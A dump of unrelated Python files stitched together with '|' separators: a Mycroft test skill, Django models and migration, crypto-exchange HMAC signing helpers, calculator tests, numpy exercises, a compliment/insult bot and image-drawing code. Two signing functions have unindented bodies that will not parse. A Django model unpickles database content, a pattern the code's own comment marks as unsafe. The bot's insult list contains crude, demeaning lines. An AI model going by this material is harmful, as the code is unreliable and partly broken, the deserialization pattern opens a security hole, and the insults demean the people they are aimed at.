        self.test_result = []
        self.responses = []
        self.files_created = []

    def get_device_name(self):
        """Return this device's registered name, or ':error:' on API failure."""
        try:
            return DeviceApi().get()['name']
        except Exception:
            # BUG FIX: previously returned the (None) result of
            # log.exception(), leaving the ':error:' line unreachable.
            self.log.exception('API Error')
            return ':error:'

    @intent_file_handler('create.tests.intent')
    def handle_create_tests(self, message):
        """Generate intent-test JSON files from the last results CSV.

        NOTE(review): relies on self.output_file, which only exists after a
        reading run in the same session — confirm this is intended.
        """
        self.log.debug('Creating test files')
        with open(self.output_file) as csvfile:
            tests_to_create = csv.DictReader(csvfile)
            for test in tests_to_create:
                if test['Skill'] == '':
                    continue
                test_file_name = "".join(
                    x for x in test['Utterance']
                    if (x.isalnum() or x in "._-")) + 'intent.json'
                # TODO Fix - need to get Skill directory from Skillname
                # [self.file_path_base, test['Skill'],
                test_file_path = '/'.join(
                    [self.file_path_base, 'mycroft-weather.mycroftai',
                     self.file_path_test, test_file_name])
                self.files_created.append(test_file_path)
                # The `with` block closes the file; no explicit close needed.
                with open(test_file_path, "w+") as test_file:
                    test_file.write(self.test_template(
                        test['Utterance'], test['IntentHandler']))

    def test_template(self, utterance, intent_type):
        """Return the JSON body for a generated intent test file.

        BUG FIX: the placeholders were previously never substituted — the
        written file contained the literal text "{utterance}".
        """
        return '\n'.join(['{',
                          '  "utterance": "{}",'.format(utterance),
                          '  "intent_type": "{}"'.format(intent_type),
                          '}'])

    @intent_file_handler('run.tests.intent')
    def handle_run_tests(self, message):
        """Kick off the Mycroft integration test runner."""
        self.speak('running tests')
        os.system('mycroft-start skillstest')

    @intent_file_handler('remove.tests.intent')
    def handle_remove_tests(self, message):
        """Delete every test file created by handle_create_tests."""
        self.log.debug('Removing files')
        files_removed = []
        for f in self.files_created:
            if os.path.exists(f):
                os.remove(f)
                files_removed.append(f)
        if set(files_removed) == set(self.files_created):
            self.speak_dialog('all.files.removed')
            self.files_created = []
        else:
            self.speak_dialog('file.removal.failed')
            self.log.info('WARNING: Some files could not be removed')
            files_not_removed = set(self.files_created) - set(files_removed)
            for f in files_not_removed:
                self.log.info(f)

    @staticmethod
    def get_skills_dir():
        """Return the configured Skills directory.

        $SKILLS_DIR wins over the value derived from mycroft.conf.
        """
        return (
            os.path.expanduser(os.environ.get('SKILLS_DIR', '')) or
            os.path.expanduser(join(
                Configuration.get()['data_dir'],
                Configuration.get()['skills']['msm']['directory']
            ))
        )

    def stop(self):
        """Detach the bus listeners if a test run is aborted."""
        self.remove_event('mycroft.skill.handler.start')
        self.remove_event('speak')
        self.remove_event('recognizer_loop:audio_output_start')
        # BUG FIX: also detach the record_begin listener added at run start.
        self.remove_event('recognizer_loop:record_begin')
def create_skill():
    """Construct the Skill instance for the Mycroft skill loader."""
    skill = SkillTesting()
    return skill
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-11 15:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: create the ``Lotte`` model for the crawl app.

    NOTE: generated migrations should not be hand-edited once applied.
    """

    dependencies = [
        ('crawl', '0002_auto_20170710_1514'),
    ]

    operations = [
        migrations.CreateModel(
            name='Lotte',
            fields=[
                # Implicit auto-increment primary key.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pro_name', models.CharField(max_length=200)),
                ('price', models.IntegerField()),
            ],
        ),
    ]
|
import tensorflow as tf
# NewCheckpointReader can read every variable saved in a checkpoint file.
# The trailing .index / .data suffixes may be omitted from the path.
reader = tf.train.NewCheckpointReader("model_saved/model.ckpt")
# Mapping of variable name -> variable shape.
global_variables = reader.get_variable_to_shape_map()
for variable_name in global_variables:
    print(variable_name, global_variables[variable_name])
print("Value for variable v1 is ", reader.get_tensor("v1"))
|
from .event import Event
from .exclusionregion import ExclusionRegion
__all__ = (Event, ExclusionRegion)
|
from random import randint
# When the bot receives a compliment
def compliment():
    """Response used when the bot itself receives a compliment."""
    replies = [
        'Thank you so much!',
        "Oh, you're too kind",
        "This is why you're my favorite!",
    ]
    return chooseResponse(replies)
def giveCompliment():
    """Return one randomly-chosen compliment from a fixed pool of phrases."""
    message = [
        'Your smile is contagious.',
        'I bet you make babies smile.',
        'You have the best laugh.',
        'You light up the room.',
        'You have a great sense of humor.',
        "If cartoon bluebirds were real, a couple of 'em would be sitting on your shoulders singing right now.",
        "You're like sunshine on a rainy day.",
        'You bring out the best in other people.',
        'I bet you sweat glitter.',
        "Colors seem brighter when you're around.",
        "You're more fun than a ball pit filled with candy.",
        'Jokes are funnier when you tell them.',
        'You always know how to find that silver lining.',
        "You're a candle in the darkness.",
        'Being around you is like a happy little vacation.',
        "You're more fun than bubble wrap.",
        "You're like a breath of fresh air.",
        "You're someone's reason to smile.",
        'You have impeccable manners.',
        'I like your style.',
        "You're strong.",
        "Is that your picture next to 'charming' in the dictionary?",
        'Your kindness is a balm to all who encounter it.',
        'You are brave.',
        'Your insides are even more beautiful than your outside.',
        'You have the courage of your convictions.',
        "You're a great listener.",
        'You were cool way before hipsters were cool.',
        "That thing you don't like about yourself is what makes you really interesting.",
        "You're inspiring.",
        "You're so thoughtful.",
        'When you make up your mind, nothing stands in your way.',
        'You seem to really know who you are.',
        "You're a smart cookie.",
        'Your perspective is refreshing.',
        'Your ability to recall random factoids at just the right times is impressive.',
        "When you say, 'I meant to do that,' I totally believe you.",
        'You have the best ideas.',
        "You're always learning new things and trying to better yourself. That's awesome.",
        'If someone based an Internet meme on you, it would have impeccable grammar.',
        'You could survive a zombie apocalypse.',
        'When you make a mistake, you fix it.',
        "You're great at figuring stuff out.",
        'Your creative potential seems limitless.',
        'I bet you do crossword puzzles in ink.',
        'You have a good head on your shoulders.',
        'Everyone gets knocked down sometimes; only people like you get back up again and keep going.',
        "You're an awesome friend.",
        "You're more helpful than you realize.",
        'Hanging out with you is always fun.',
        "That thing where you know when someone needs something? That's amazing.",
        'Being around you makes everything better.',
        'You should be thanked more often. Thank you.',
        "Our community is better because you're in it.",
        "Someone is getting through something hard right now because you've got their back. Nice work.",
        'You always know just what to say.',
        'The people you love are lucky to have you in their lives.',
        'Any team would be lucky to have you on it.',
        'Defenseless animals are drawn to you.',
        'The way you treasure your loved ones is incredible.',
        "You're a gift to those around you.",
        'You look great today.',
        'Your eyes are breathtaking.',
        "How is it that you always look so great, even if you're in ratty pajamas?",
        'That color is perfect on you.',
        'You smell really good.',
        "You may dance like no one's watching, but everyone's watching because you're mesmerizing.",
        'You have cute elbows. For real.',
        'Your bellybutton is kind of adorable.',
        'Your hair looks stunning.',
        'Your voice is magnificent.',
        'Your name suits you to a T.',
        "You're irresistible when you blush.",
        'Has anyone ever told you that you have great posture?',
        'I appreciate you.',
        'You are the most perfect you there is.',
        'You are enough.',
        "You're all that and a super-size bag of chips.",
        "On a scale from 1 to 10, you're an 11.",
        "You've got all the right moves.",
        'Everything would be better if more people were like you.',
        "When you're not afraid to be yourself, that's when you're incredible.",
        "You're wonderful.",
        "You're better than a triple-scoop ice cream cone. With sprinkles.",
        "You're one of a kind.",
        "If you were a box of crayons, you'd be the big industrial name-brand one with a built-in sharpener.",
        'Who raised you? They deserve a medal for a job well done.',
        'Somehow you make time stop and fly all at the same time.',
        "In high school, I bet you were voted 'most likely to continue being awesome.'",
        "If you were a scented candle they'd have to call it Perfectly Imperfect (and it would smell like summer).",
        "There's ordinary, and then there's you.",
        "You're even better than a unicorn because you're real.",
        "You're really something special."
    ]
    return chooseResponse(message)
def insult():
    """Response used when the bot itself is insulted."""
    retorts = [
        'Well that was rude',
        'No need to be mean',
        'That was uncalled for',
        "Let's at least try to be civil",
    ]
    return chooseResponse(retorts)
def giveInsult():
    """Return one randomly-chosen insult from a fixed pool of phrases."""
    message = [
        'If laughter is the best medicine, your face must be curing the world.',
        "You're so ugly, you scared the crap out of the toilet.",
        'Your family tree must be a cactus because everybody on it is a prick.',
        "No I'm not insulting you, I'm describing you.",
        "It's better to let someone think you are an Idiot than to open your mouth and prove it.",
        "If I had a face like yours, I'd sue my parents.",
        'Your birth certificate is an apology letter from the condom factory.',
        'I guess you prove that even god makes mistakes sometimes.',
        "The only way you'll ever get laid is if you crawl up a chicken's ass and wait.",
        "You're so fake, Barbie is jealous.",
        "My psychiatrist told me I was crazy and I said I want a second opinion. He said okay, you're ugly too.",
        "You're so ugly, when your mom dropped you off at school she got a fine for littering.",
        "If I wanted to kill myself I'd climb your ego and jump to your IQ.",
        "You must have been born on a highway because that's where most accidents happen.",
        "Brains aren't everything. In your case they're nothing.",
        "I don't know what makes you so stupid, but it really works.",
        'Roses are red violets are blue, God made me pretty, what happened to you?',
        'Behind every fat woman there is a beautiful woman. No seriously, your in the way.',
        'Calling you an idiot would be an insult to all the stupid people.',
        'You, sir, are an oxygen thief!',
        'Some babies were dropped on their heads but you were clearly thrown at a wall.',
        "Don't like my sarcasm, well I don't like your stupid.",
        "Why don't you go play in traffic.",
        "I'd slap you, but that would be animal abuse.",
        'They say opposites attract. I hope you meet someone who is good-looking, intelligent, and cultured.',
        "Stop trying to be a smart ass, you're just an ass.",
        'The last time I saw something like you, I flushed it.',
        "'m busy now. Can I ignore you some other time?",
        'You have Diarrhea of the mouth; constipation of the ideas.',
        "If ugly were a crime, you'd get a life sentence.",
        'Your mind is on vacation but your mouth is working overtime.',
        "Why don't you slip into something more comfortable... like a coma.",
        'Shock me, say something intelligent.',
        'If your gonna be two faced, honey at least make one of them pretty.',
        "Keep rolling your eyes, perhaps you'll find a brain back there.",
        'You are not as bad as people say, you are much, much worse.',
        "I don't know what your problem is, but I'll bet it's hard to pronounce.",
        'You get ten times more girls than me? ten times zero is zero...',
        'There is no vaccine against stupidity.',
        "You're the reason the gene pool needs a lifeguard.",
        "Sure, I've seen people like you before - but I had to pay an admission.",
        "How old are you? - Wait I shouldn't ask, you can't count that high.",
        "Have you been shopping lately? They're selling lives, you should go get one.",
        "You're like Monday mornings, nobody likes you.",
        'Of course I talk like an idiot, how else would you understand me?',
        'All day I thought of you... I was at the zoo.',
        'To make you laugh on Saturday, I need to you joke on Wednesday.',
        "You're so fat, you could sell shade.",
        "I'd like to see things from your point of view but I can't seem to get my head that far up my ass.",
        "Don't you need a license to be that ugly?",
        'My friend thinks he is smart. He told me an onion is the only food that makes you cry, so I threw a coconut at his face.',
        'Your house is so dirty you have to wipe your feet before you go outside.',
        "If you really spoke your mind, you'd be speechless.",
        'Stupidity is not a crime so you are free to go.',
        'You are so old, when you were a kid rainbows were black and white.',
        'If I told you that I have a piece of dirt in my eye, would you move?',
        'You so dumb, you think Cheerios are doughnut seeds.',
        'So, a thought crossed your mind? Must have been a long and lonely journey.',
        'You are so old, your birth-certificate expired.',
        "Every time I'm next to you, I get a fierce desire to be alone.",
        "You're so dumb that you got hit by a parked car.",
        "Keep talking, someday you'll say something intelligent!",
        "You're so fat, you leave footprints in concrete.",
        'How did you get here? Did someone leave your cage open?',
        "Pardon me, but you've obviously mistaken me for someone who gives a damn.",
        "Wipe your mouth, there's still a tiny bit of bullshit around your lips.",
        "Don't you have a terribly empty feeling - in your skull?",
        'As an outsider, what do you think of the human race?',
        "Just because you have one doesn't mean you have to act like one.",
        'We can always tell when you are lying. Your lips move.',
        'Are you always this stupid or is today a special occasion?'
    ]
    return(chooseResponse(message))
def thanked():
    """Response used when someone thanks the bot."""
    acknowledgements = [
        "You're welcome",
        'Anytime',
        'No Problem',
        "I'm happy to be of service",
    ]
    return chooseResponse(acknowledgements)
def chooseResponse(messages):
    """Return a uniformly random element of *messages*.

    Uses the standard library's random.choice instead of hand-rolling
    the selection with randint/indexing.
    """
    import random
    return random.choice(messages)
# Quick manual smoke test: print one response of each type.
# (Redundant str() wrappers removed — the functions already return str.)
print(compliment())
print()
print(giveCompliment())
print()
print(insult())
print()
print(giveInsult())
"""
here there are 23 exercises which is based on topics
asarray(),linspace(),logspace(),basic slicing
"""
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
# In[2]:
#np.empty-creates uninitialized array of specified shape and dtype
#np.empty(shape, dtype, order)
arr1 = np.empty([2,3], dtype = int)
print(arr1)
# In[3]:
arr2 = np.empty([3,2], dtype = float)
print(arr2)
# In[4]:
#np.asarray(a,dtype,order)-converts python sequence into ndarray
# a-input data such as list,list of tuples,tuples etc..,
list1 = [2,4,6,8] #convert list to ndarray
arr3 = np.asarray(list1)
print(arr3)
# In[5]:
#In np.asarray, dtype is set to float
arr4 = np.asarray(list1, dtype = float)
print(arr4)
# In[6]:
#ndarray from a tuple using asarray()
tup1 = (1,3,5,7)
arr5 = np.asarray(tup1)
print(arr5)
# In[7]:
#ndarray from list of tuples using asarray()
lt = [(11,15),(20,18,25)]
arr6 = np.asarray(lt)
print(arr6)
# In[8]:
#np.linspace(start,stop,num,endpoint,retstep,dtype) -similar to arange() instead of step size number of evenly spaced values between interval is specified
arr7 = np.linspace(1,30) #default num 50 evenly spaced samples generated
print(arr7)
# In[9]:
# 8 number of evenly spaced values between 10 to 20
arr8 = np.linspace(10,20,8)
print(arr8)
# In[10]:
# endpoint is set to false (stop value 60 will not be included since endpoint is false)
arr9 = np.linspace(50,60,5,endpoint = False)
print(arr9)
# In[11]:
# to find retstep value-true-returns samples and step value
a = np.linspace(1,3,5, retstep = True)
print(a) #here retstep value is 0.5
# In[12]:
# logspace-returns numbers that are evenly spaced on a logspace
#np.logspace(start,stop,num,endpoint,base,dtype)
#start and stop endpoints of the scale are indices of the base,default-10
a1 = np.logspace(1,2,num = 10)
print(a1)
# In[13]:
# setting base of logspace to 2
a2 = np.logspace(2,11,num = 10,base = 2)
print(a2)
# In[14]:
#basic slicing - slice(start,stop,step)
#slice object is passed to extract a part of array
ar1 = np.arange(10) #ndarray is created by arange function
s = slice(1,10,2) #starting from 1 to 9 with step of 2 is sliced
print(ar1[s])
# In[15]:
#same result is obtained when slicing parameters are separated by a colon :
ar2 = ar1[1:10:2]
print(ar2)
# In[16]:
#slicing a single item
ar3 = ar1[6]
print(ar3)
# In[17]:
#slicing items in ndarray starting from index
ar4 = ar1[4:]
print(ar4)
# In[18]:
#slicing items between 5 and 10
ar5 = ar1[5:10]
print(ar5)
# In[19]:
#slicing multi-dimensional array
ar6 = np.array([[4,5,6],[7,8,9],[10,11,12]])
print(ar6)
print(ar6[1:]) # slice array from the index a[1:]
# In[20]:
# slicing done using (...) to make selction tuple of same length as dimension of an array
# to slice the array ar6 of items in second row
print("Sliced items in second row: ",ar6[1,...])
# In[21]:
#to slice the items in second column of ar6
print("Items in second column: ",ar6[...,1])
# In[22]:
#slicing all items from column 1 onwards
print("The items from column 1 onwards: ")
print(ar6[...,1:])
# In[23]:
print("Items from row 1 onwards:")
print(ar6[1:,...])
|
# coding: utf8
from django.db import models
from django.contrib.auth.models import User, PermissionsMixin
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth import get_user_model
# Create your models here.
from django.db.models import Model
from django.db.models.signals import pre_save,post_save
from datetime import date
from django.core import validators
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from TeacherGolos.permissions import GroupPermissionsMixin,UserGroup
from TeacherGolos.usermanager import Person
from TeacherGolos.utils import link_generate,create_pass
import json
import pickle
from TeacherGolos.operations.WorkFlow import WorkFlow
class ActionToken(Model):
    """A pending action/event identified by a short code.

    ``params`` stores a JSON-encoded dict; ``workflow`` stores a pickled
    WorkFlow object in a CharField.  NOTE(review): unpickling database
    content is unsafe if the field can ever be written by an untrusted
    party, and pickle bytes in a CharField may not round-trip — confirm.
    """
    action = models.CharField(u'Действие',max_length=20)
    state = models.CharField(u'Состояние',max_length=20)
    code = models.CharField(u'Код',max_length=10)
    params = models.CharField(u'Параметры',max_length=600,default="")
    workflow = models.CharField(u'Задания',max_length=600,default="")

    def set_code(self):
        """Generate a fresh access code (does not save the instance)."""
        self.code=create_pass()
        #self.save()

    def save_params(self, params):
        """JSON-encode *params* into the params field; True on success."""
        try:
            self.params=json.dumps(params)
            return True
        except:
            return False

    def save_workflow(self, params):
        """Pickle *params* into the workflow field; True on success."""
        try:
            self.workflow=pickle.dumps(params)
            return True
        except:
            return False

    def load_params(self):
        """Decode the params field; empty dict if missing/corrupt."""
        try:
            return json.loads(self.params)
        except:
            return {}

    def load_workflow(self):
        """Unpickle the workflow field; a fresh WorkFlow on any failure."""
        try:
            w= pickle.loads(self.workflow)
            if w==None:
                return WorkFlow()
            return w
        except:
            return WorkFlow()

    def __unicode__(self):
        # Python 2 style display name (this codebase targets Python 2).
        return u'Событие %s[%s]' % (self.action,self.load_workflow().current)

    def show_params(self):
        """Return the params of the stored workflow."""
        return self.load_workflow().params

    @property
    def info_params(self):
        # Property alias used by the admin/templates.
        return self.show_params()

    class Meta:
        verbose_name_plural = u"События"
class Task(Model):
    """A poll/assignment shown to a user group.

    The *_tag/*_link helpers return HTML fragments for the Django admin
    (allow_tags is the pre-Django-2.0 way to mark them safe).
    """
    text = models.CharField(u'Текст задания', max_length=120)
    photo = models.ImageField(u'Фото к заданию',upload_to='tasks',blank=True)
    photo_width = models.IntegerField(u'Длина фотографии',default=100)
    photo_height = models.IntegerField(u'Ширина фотографии',default=100)
    group = models.ForeignKey(UserGroup)

    def photo_tag(self):
        """Admin thumbnail: <img> sized by photo_width/photo_height."""
        return u'<img src="/static/media/%s" style="width:%spx;height:%spx;" />' % (self.photo.name,self.photo_width,self.photo_height)
    photo_tag.allow_tags = True
    photo_tag.short_description = u"Фото"

    def activate_url(self):
        """Activation URL embedding group, password and task ids."""
        return link_generate(group=self.group.pk,code=self.group.password,task=self.pk,type='task')
    activate_url.allow_tags = True
    activate_url.short_description = u"Активационный код"

    def activate_link(self):
        """Clickable activation link labelled with the group password."""
        return u'<a href="%s">%s</a>' % (self.activate_url(),self.group.password)
    activate_link.allow_tags = True
    activate_link.short_description = u"Активационная сслыка"

    def qr_link(self):
        """URL of the QR-code image for this task's activation link."""
        return link_generate(group=self.group.pk,code=self.group.password,task=self.pk,type='task',url='qr')
    qr_link.allow_tags = True

    def qr_img(self):
        """Admin <img> tag showing the QR code."""
        return "<img src='%s' style='width:100px;height:100px;' />" % (self.qr_link())
    qr_img.allow_tags = True
    qr_img.short_description = u"QR-код"

    def __unicode__(self):
        return u'Опрос:%s' % self.text

    class Meta:
        verbose_name_plural = u"Задания"
class AnswerType(Model):
    """One selectable answer option belonging to a Task."""
    text = models.CharField(u'Текст ответа', max_length=60)
    task = models.ForeignKey(Task)

    def __unicode__(self):
        return u'Ответ : %s' % self.text

    def answer_info(self):
        """Serializable summary used by the voting API/templates.

        NOTE: uses the Python 2 builtin `unicode` (py2-only codebase).
        """
        return {u'text':unicode(self.text),u'pk':self.pk}

    class Meta:
        verbose_name_plural = u'Варианты ответа'
class Vote(Model):
    """A single user's chosen AnswerType for a Task."""
    user = models.ForeignKey(Person)
    task = models.ForeignKey(Task)
    answer = models.ForeignKey(AnswerType)

    def __unicode__(self):
        return u'Ответ:[%s -> %s]' % (self.task.text,self.answer.text)

    @property
    def info(self):
        # Convenience alias for display code.
        return self.__unicode__()

    class Meta:
        verbose_name_plural = u'Ответы'
def pre_save_receiver_usergroup(sender, instance, **kwargs):
    """Fill in default values on a UserGroup just before it is saved."""
    if not instance.max_count:
        instance.max_count = 1
    today = date.today()
    if not instance.from_date:
        instance.from_date = today
    if not instance.to_date:
        instance.to_date = today
    if not instance.password:
        instance.password = create_pass()
def pre_save_receiver_task(sender, instance, **kwargs):
    """Ensure a Task has a photo and a group just before it is saved."""
    if not instance.photo:
        # Point the empty ImageField at the bundled placeholder image.
        instance.photo.name = 'tasks/default.jpg'
    if not instance.group:
        instance.group = UserGroup.objects.get(name=u'Студенты')
# Register the default-filling receivers with Django's pre_save signal.
pre_save.connect(pre_save_receiver_usergroup, sender=UserGroup)
pre_save.connect(pre_save_receiver_task, sender=Task)
|
import os
import hmac
import hashlib
from urllib import urlencode as _urlencode
import base64
from enums.exchange import EXCHANGE
from utils.exchange_utils import get_exchange_name_by_id
# Module-level cache: exchange_id -> ExchangeKey, populated by load_keys().
access_keys = {}
class ExchangeKey(object):
    """Holds one exchange's API key pair (public key + secret)."""

    def __init__(self, api_key, secret):
        self.api_key = api_key
        self.secret = secret

    @classmethod
    def from_file(cls, path, exchange_name):
        """Load a key pair from ``<path>/<exchange_name lowercased>.key``.

        The file's first line is the api key, the second is the secret;
        any further lines are ignored.
        """
        array = []
        full_path = os.path.join(path, exchange_name.lower() + ".key")
        with open(full_path, "r") as myfile:
            for line in myfile:
                array.append(line.rstrip())
                if len(array) == 2:
                    break
        # BUG FIX (idiom): use cls instead of the hard-coded class name so
        # subclasses get instances of their own type.
        return cls(array[0], array[1])
def signed_body(body, secret):
    """HMAC-SHA512-sign the urlencoded POST *body* with *secret*.

    NOTE(review): Python 2 only — under Python 3, hmac.new() requires
    bytes and this passes str objects straight through; confirm before
    porting.
    """
    # The query's POST data signed by your key's "secret" according to the HMAC-SHA512 method.
    payload = hmac.new(secret, _urlencode(body), hashlib.sha512).hexdigest()
    return payload
def signed_body_256(body, secret):
# The query's POST data signed by your key's "secret" according to the
# HMAC-SHA512 method.
payload = hmac.new(secret.encode('utf-8'), _urlencode(body).encode('utf-8'), hashlib.sha256).hexdigest()
return payload
def sign_string_256_base64(secret, msg):
    """Return the base64-encoded HMAC-SHA256 of *msg* keyed with *secret*."""
    digest = hmac.new(
        key=secret.encode('utf-8'),
        msg=msg.encode('utf-8'),
        digestmod=hashlib.sha256,
    ).digest()
    return base64.b64encode(digest)
def signed_string(body, secret):
    """HMAC-SHA512-sign the raw string *body* with *secret*.

    NOTE(review): Python 2 only — under Python 3, hmac.new() requires
    bytes for both the key and the message; confirm before porting.
    """
    # The query's POST data signed by your key's "secret" according to the HMAC-SHA512 method.
    payload = hmac.new(secret, body, hashlib.sha512).hexdigest()
    return payload
def sign_kraken(body, urlpath, secret):
""" Sign request data according to Kraken's scheme.
:param body: API request parameters
:type body: dict
:param urlpath: API URL path sans host
:type urlpath: str
:returns: signature digest
"""
postdata = _urlencode(body)
# Unicode-objects must be encoded before hashing
encoded = (str(body['nonce']) + postdata).encode()
message = urlpath.encode() + hashlib.sha256(encoded).digest()
signature = hmac.new(base64.b64decode(secret), message, hashlib.sha512)
sigdigest = base64.b64encode(signature.digest())
return sigdigest.decode()
def load_keys(path):
    """Populate the module-level key cache for every known exchange.

    :param path: folder with one ``<exchange_name>.key`` file per exchange
    """
    # Mutating the module-level dict needs no `global` statement.
    for exchange_id in EXCHANGE.values():
        name = get_exchange_name_by_id(exchange_id)
        access_keys[exchange_id] = ExchangeKey.from_file(path, name)
def load_key_by_exchange(path, exchange_id):
    """Load and cache the key pair for a single exchange."""
    name = get_exchange_name_by_id(exchange_id)
    access_keys[exchange_id] = ExchangeKey.from_file(path, name)
def get_key_by_exchange(exchange_id):
    """Return the cached ExchangeKey for *exchange_id*, or None if absent."""
    key = access_keys.get(exchange_id)
    return key
|
from calculator import Calculator
import unittest
class TestCalculator(unittest.TestCase):
    """Unit tests for the project-local Calculator class.

    NOTE(review): the trig tests compare floats with assertEqual, which
    only passes if Calculator returns math.sin/cos/tan bit-for-bit;
    assertAlmostEqual would be more robust — confirm.
    """
    # test 1: addition accepts mixed int/float operands
    def test_calculator_add(self):
        result = Calculator().add(5.0,5)
        self.assertEqual(10.0, result)
        result = Calculator().add(2.0,3)
        self.assertEqual(5.0, result)
    # test 2: subtraction
    def test_calculator_sub(self):
        result = Calculator().subtract(5,5)
        self.assertEqual(0, result)
        result = Calculator().subtract(3,2)
        self.assertEqual(1, result)
    # test 3: multiplication, including a fractional factor
    def test_calculator_multiply(self):
        result = Calculator().multiply(5,5)
        self.assertEqual(25.0, result)
        result = Calculator().multiply(5,1)
        self.assertEqual(5.0, result)
        result = Calculator().multiply(5,1)
        self.assertEqual(5.0, result)
        result = Calculator().multiply(5, 0.2)
        self.assertEqual(1.0, result)
    # test 4: division, including a fractional divisor
    def test_calculator_divide(self):
        result = Calculator().divide(5.0,5)
        self.assertEqual(1.0, result)
        result = Calculator().divide(5.0,1)
        self.assertEqual(5.0, result)
        result = Calculator().divide(1.0,5)
        self.assertEqual(0.2, result)
        result = Calculator().divide(5.0, 0.2)
        self.assertEqual(25.0, result)
    # test 5: exponentiation
    def test_calculator_exponential(self):
        result = Calculator().exponent(5.0,2)
        self.assertEqual(25.0, result)
        result = Calculator().exponent(5.0,3)
        self.assertEqual(125.0, result)
    # test 6: square
    def test_calculator_square(self):
        result = Calculator().square(5.0)
        self.assertEqual(25.0, result)
        result = Calculator().square(7)
        self.assertEqual(49.0, result)
    # test 7: cube
    def test_calculator_cube(self):
        result = Calculator().cube(5.0)
        self.assertEqual(125.0, result)
        result = Calculator().cube(7)
        self.assertEqual(343.0, result)
    # test 8: sine (odd function: sin(-x) == -sin(x))
    def test_calculator_sin(self):
        result = Calculator().sin(3)
        self.assertEqual(0.1411200080598672, result)
        result = Calculator().sin(-3)
        self.assertEqual(-0.1411200080598672, result)
    # test 9: cosine (even function: cos(-x) == cos(x))
    def test_calculator_cos(self):
        result = Calculator().cos(3)
        self.assertEqual(-0.9899924966004454, result)
        result = Calculator().cos(-3)
        self.assertEqual(-0.9899924966004454, result)
        result = Calculator().cos(0)
        self.assertEqual(1.0, result)
    # test 10: tangent (odd function: tan(-x) == -tan(x))
    def test_calculator_tan(self):
        result = Calculator().tan(3)
        self.assertEqual(-0.1425465430742778, result)
        result = Calculator().tan(-3)
        self.assertEqual(0.1425465430742778, result)
        result = Calculator().tan(0)
        self.assertEqual(0.0, result)
# Allow the suite to be run directly with `python <this file>`.
if __name__ == '__main__':
    unittest.main()
|
def giveDiv(n):
    """Return the divisors of n in ascending order, always including n."""
    # A proper divisor of n never exceeds n // 2, so scanning up to
    # n // 2 + 1 finds all of them; n itself is appended when missing.
    divisors = [i for i in range(1, n // 2 + 2) if n % i == 0]
    if divisors[-1] != n:
        divisors.append(n)
    return divisors
# Read n and a string s; for every divisor i of n (ascending order),
# reverse the prefix of s of length i.  Prints the transformed string.
n=int(input())
divar=giveDiv(n)
#print(divar)
s=input()
for i in divar:
    # Keep the tail, flip the first i characters, and reassemble.
    retain=s[i:]
    reverse=s[:i]
    reverse=reverse[::-1]
    s=reverse+retain
print(s)
from sklearn import datasets
import numpy as np
def get():
    """Return the scikit-learn diabetes dataset as a features/labels dict.

    'features' is the (n_samples, n_features) data matrix; 'labels' is the
    target vector reshaped into an (n_samples, 1) column.
    """
    diabetes = datasets.load_diabetes()
    return {
        'features': diabetes.data,
        'labels': diabetes.target.reshape(-1, 1),
    }
|
import os
import json
import re
import glob
# Scan Turtle (.ttl) ontology files and build a {label: [categories]} map
# from their rdfs:label annotations, then dump it to terms1.json.
ttl_files = glob.glob('src/*.ttl');
terms = {}
for ttl_file in ttl_files:
    # Only the "realm" and "phen..." ontology files are of interest.
    if not re.search('realm', ttl_file) and not re.search('phen', ttl_file):
        continue
    print(ttl_file)
    category = None
    with open(ttl_file) as origin_file:
        for line in origin_file:
            #line = re.findall(r'rdfs:label', line)
            if "rdfs:label" in line:
                # Extract the text between the first pair of double quotes.
                idx1 = line.find('"')
                idx2 = line.find('"', idx1+1)
                field = line[idx1+1:idx2]
            else:
                continue
            if re.findall(r'SWEET', field):
                # Labels like "SWEET Ontology Foo" open a new category;
                # subsequent plain labels are filed under it.
                category = re.sub('SWEET Ontology ', '', field)
            elif terms.get(field, ''):
                terms[field].append(category)
            else:
                terms[field] = [category]
#print(terms)
#SWEET Ontology
#$categories[$category] = @keywords;
#my $json = encode_json @categories;
#print "$json"; #$category: @keywords\n";
#quit()
json_folder_path = '.'
with open(os.path.join(json_folder_path, "terms1.json"), "w") as fp:
    json.dump(terms, fp, indent=4)
|
from django.urls import path
from . import views
# URL routes for this app; each `name` is reversible via {% url %} / reverse().
urlpatterns = [
    path('get_cards/', views.get_cards, name='get_cards'),
    path('add_cards/', views.add_cards, name='add_cards'),
    # path('search_cards/', views.search_cards, name='search_cards'),
    path('load_users/', views.load_users, name='load_users'),
]
import cv2
import numpy as np
from matplotlib import pyplot as plt
from src.utils.const import KEYPOINT_PAIRS
# Drawing colours as 3-channel tuples.
# NOTE(review): the rest of this module treats images as BGR, in which
# (0, 0, 255) renders red and (255, 140, 0) renders blue-ish — confirm the
# intended channel order behind these names.
BLUE_COLOR = (0, 0, 255)
ORANGE_COLOR = (255, 140, 0)
GREEN_COLOR = (0, 188, 0)
def draw_bbox(
    bboxes: np.ndarray,
    image: np.ndarray,
    format='xyxy',
) -> np.ndarray:
    """Draw bounding boxes over a copy of *image* and return it.
    Args:
        bboxes (np.ndarray): [N, 5] or [N, 4] bounding box of object.
        image (np.ndarray): [H, W, 3] Image with BGR format.
        format (str): format of bounding box 'xyxy' stand for
            xmin, ymin, xmax, ymax and 'xywh' stand for
            xmin, ymin, width, height.
    Returns:
        A numpy array plotted image with BGR format.
    """
    # BUG FIX: the original body only unpacked `bboxes[:4]` (the first 4
    # *rows*, not one box's coordinates) and returned None; this implements
    # the behaviour the docstring promises.
    image_plot = image.copy()
    for bbox in bboxes:
        xmin, ymin = int(bbox[0]), int(bbox[1])
        if format == 'xywh':
            # Convert width/height into the bottom-right corner.
            xmax, ymax = xmin + int(bbox[2]), ymin + int(bbox[3])
        else:
            xmax, ymax = int(bbox[2]), int(bbox[3])
        # Extra columns (e.g. a confidence score at index 4) are ignored.
        image_plot = cv2.rectangle(
            img=image_plot, pt1=(xmin, ymin), pt2=(xmax, ymax),
            color=GREEN_COLOR, thickness=1,
        )
    return image_plot
def draw_keypoint(
    keypoints: np.ndarray,
    image: np.ndarray,
    radius=4,
    thickness=1,
    show=False,
    save_path=None,
) -> np.ndarray:
    """Visualize plotted keypoint and choose to plot or save plotted image.
    Args:
